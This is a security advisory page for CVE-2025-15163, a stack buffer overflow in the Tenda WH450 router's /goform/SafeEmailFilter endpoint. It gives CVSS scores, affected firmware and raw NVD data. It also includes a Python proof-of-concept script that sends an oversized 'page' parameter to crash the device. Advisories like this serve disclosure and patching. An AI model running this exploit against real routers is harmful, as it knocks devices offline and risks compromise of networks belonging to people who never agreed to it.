Security Vulnerability Report
CVE-2025-15163 CVSS 7.2 HIGH

Published: 2025-12-29 01:15:53
Last Modified: 2025-12-30 21:38:48

Description

A vulnerability was identified in Tenda WH450 1.0.0.18. It affects unknown functionality of the file /goform/SafeEmailFilter. Manipulating the argument page leads to a stack-based buffer overflow. The attack can be carried out remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:wh450_firmware:1.0.0.18:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:wh450:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda WH450 < 1.0.0.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
"""
CVE-2025-15163 PoC - Tenda WH450 Stack Buffer Overflow
Target: /goform/SafeEmailFilter endpoint
Vulnerability: Stack-based buffer overflow via page parameter
CVSS: 7.2 (High)
"""
import requests
import sys


def exploit_cve_2025_15163(target_ip, target_port=80):
    """
    Exploit CVE-2025-15163 - Stack buffer overflow in Tenda WH450

    Args:
        target_ip: Target router IP address
        target_port: Target HTTP port (default: 80)

    Returns:
        bool: True if exploit sent successfully, False otherwise
    """
    # Construct the target URL
    url = f"http://{target_ip}:{target_port}/goform/SafeEmailFilter"

    # Create overflow payload - 1000 bytes to trigger overflow
    # Adjust length based on actual buffer size
    overflow_length = 1000
    overflow_payload = "A" * overflow_length

    # Prepare the data payload
    data = {
        "page": overflow_payload,
        "action": "save"
    }

    try:
        # Send the malicious request
        response = requests.post(url, data=data, timeout=10)
        print(f"[*] Exploit payload sent to {url}")
        print(f"[*] Payload length: {overflow_length} bytes")
        print(f"[*] Response status: {response.status_code}")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[!] Error sending exploit: {e}")
        return False


def check_vulnerability(target_ip, target_port=80):
    """
    Check if target is vulnerable to CVE-2025-15163
    """
    url = f"http://{target_ip}:{target_port}/goform/SafeEmailFilter"
    try:
        # Send normal request to check if endpoint exists
        response = requests.get(url, timeout=10)
        if response.status_code in [200, 400, 500]:
            print(f"[+] Target {target_ip} has /goform/SafeEmailFilter endpoint")
            return True
    except requests.exceptions.RequestException:
        # Connection errors and timeouts are treated as "endpoint not reachable"
        pass
    print(f"[-] Target {target_ip} does not appear to be vulnerable")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_15163.py <target_ip> [port]")
        print("Example: python cve_2025_15163.py 192.168.0.1 80")
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80

    print(f"[*] Checking target: {target}:{port}")
    check_vulnerability(target, port)
    print("[*] Sending exploit payload...")
    exploit_cve_2025_15163(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15163", "sourceIdentifier": "[email protected]", "published": "2025-12-29T01:15:53.347", "lastModified": "2025-12-30T21:38:48.280", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Tenda WH450 1.0.0.18. Affected by this issue is some unknown functionality of the file /goform/SafeEmailFilter. The manipulation of the argument page leads to stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:C/I:C/A:C", "baseScore": 8.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 6.4, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:wh450_firmware:1.0.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "D139CB33-CD57-41A7-93EF-E84B1F6D2814"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:wh450:-:*:*:*:*:*:*:*", "matchCriteriaId": "395B4439-4840-4353-B963-B82AC569E265"}]}]}], "references": [{"url": "https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/SafeEmailFilter/SafeEmailFilter.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, 
{"url": "https://vuldb.com/?ctiid.338538", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338538", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.721214", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}]}}